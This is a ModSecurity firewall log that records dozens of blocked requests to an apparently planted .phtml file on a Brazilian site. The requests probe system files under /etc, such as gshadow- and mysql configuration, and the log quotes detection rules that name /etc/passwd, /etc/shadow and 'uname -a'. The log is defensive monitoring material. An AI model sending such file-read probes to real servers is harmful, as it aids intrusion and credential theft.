[Thu Mar 19 13:21:49.992176 2026] [:error] [pid 15826:tid 140411582465792] [client 57.141.18.46:48830] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwineoXxyEfFpUF8f8f6gAAAVM"]
[Thu Mar 19 13:21:50.016071 2026] [:error] [pid 17887:tid 140411557287680] [client 57.141.18.120:48832] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwingkwaGbbGflqUZDaiwAAANY"]
[Thu Mar 19 13:21:51.656638 2026] [:error] [pid 17887:tid 140411565680384] [client 57.141.18.64:48842] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwingkwaGbbGflqUZDajAAAANU"]
[Thu Mar 19 13:21:51.657910 2026] [:error] [pid 30077:tid 140411548894976] [client 57.141.18.31:48846] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwinvu8EFLIOrSqIpu7cQAAAlc"]
[Thu Mar 19 13:21:51.660081 2026] [:error] [pid 26799:tid 140411574073088] [client 57.141.18.44:48850] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwinta6ubjKNq_cu4ZptgAAA1Q"]
[Thu Mar 19 13:21:51.661383 2026] [:error] [pid 19093:tid 140411733534464] [client 57.141.18.35:48854] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwinl_V7PWP6ixUYl7PngAAAoE"]
[Thu Mar 19 13:21:51.688014 2026] [:error] [pid 17653:tid 140411666392832] [client 57.141.18.53:48868] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwin8df6f5d65gmYZSMNAAAAsk"]
[Thu Mar 19 13:21:51.700361 2026] [:error] [pid 27293:tid 140411683178240] [client 57.141.18.11:48848] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwinv-YZRR_7pZ7nDKebAAAA8c"]
[Thu Mar 19 13:21:51.712970 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.49:48872] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwin9a6ubjKNq_cu4ZpuAAAA0M"]
[Thu Mar 19 13:21:51.939289 2026] [:error] [pid 26799:tid 140411557287680] [client 57.141.18.83:48896] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwin9a6ubjKNq_cu4ZpuQAAA1Y"]
[Thu Mar 19 13:21:52.054970 2026] [:error] [pid 30077:tid 140411565680384] [client 57.141.18.63:48900] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwioPu8EFLIOrSqIpu7cgAAAlU"]
[Thu Mar 19 13:21:52.566876 2026] [:error] [pid 14269:tid 140411582465792] [client 57.141.18.95:48920] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwioAbLMZ6AikZjR9VwZAAAABM"]
[Thu Mar 19 13:21:52.892607 2026] [:error] [pid 27293:tid 140411565680384] [client 57.141.18.28:48928] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwioP-YZRR_7pZ7nDKecAAAA9U"]
[Thu Mar 19 13:21:53.130060 2026] [:error] [pid 31803:tid 140411725141760] [client 57.141.18.40:48936] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwioeyqAr6etmhZHNpy0wAAAEI"]
[Thu Mar 19 13:21:53.408090 2026] [:error] [pid 15826:tid 140411548894976] [client 57.141.18.123:48942] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwioeoXxyEfFpUF8f8f7AAAAVc"]
[Thu Mar 19 13:21:53.738009 2026] [:error] [pid 17887:tid 140411632822016] [client 57.141.18.0:48946] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwioQkwaGbbGflqUZDajQAAAM0"]
[Thu Mar 19 13:21:54.183463 2026] [:error] [pid 27403:tid 140411683178240] [client 57.141.18.87:48958] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiohkFeYa1D6dYQnAELgAAAcc"]
[Thu Mar 19 13:21:54.464355 2026] [:error] [pid 15826:tid 140411557287680] [client 57.141.18.53:48964] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiouoXxyEfFpUF8f8f7QAAAVY"]
[Thu Mar 19 13:21:54.882138 2026] [:error] [pid 19093:tid 140411699963648] [client 57.141.18.66:48968] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiol_V7PWP6ixUYl7PoAAAAoU"]
[Thu Mar 19 13:21:55.498089 2026] [:error] [pid 19093:tid 140411691570944] [client 57.141.18.56:48982] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwio1_V7PWP6ixUYl7PoQAAAoY"]
[Thu Mar 19 13:21:55.671162 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.61:48988] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwio-oXxyEfFpUF8f8f7gAAAU8"]
[Thu Mar 19 13:21:55.723092 2026] [:error] [pid 17887:tid 140411616036608] [client 57.141.18.35:48992] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiowkwaGbbGflqUZDajgAAAM8"]
[Thu Mar 19 13:21:56.343754 2026] [:error] [pid 27403:tid 140411582465792] [client 57.141.18.58:48998] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwipBkFeYa1D6dYQnAELwAAAdM"]
[Thu Mar 19 13:21:56.612129 2026] [:error] [pid 31803:tid 140411607643904] [client 57.141.18.107:49006] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwipOyqAr6etmhZHNpy1gAAAFA"]
[Thu Mar 19 13:21:56.852085 2026] [:error] [pid 19093:tid 140411540502272] [client 57.141.18.3:49010] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwipF_V7PWP6ixUYl7PogAAApg"]
[Thu Mar 19 13:21:56.932179 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.39:49012] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwipNa6ubjKNq_cu4ZpuwAAA1g"]
[Thu Mar 19 13:21:57.078789 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.15:49014] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwipeoXxyEfFpUF8f8f7wAAAUo"]
[Thu Mar 19 13:21:58.216755 2026] [:error] [pid 17887:tid 140411641214720] [client 57.141.18.66:49034] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwipgkwaGbbGflqUZDajwAAAMw"]
[Thu Mar 19 13:21:58.872115 2026] [:error] [pid 14269:tid 140411616036608] [client 57.141.18.113:49046] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwipgbLMZ6AikZjR9VwaAAAAA8"]
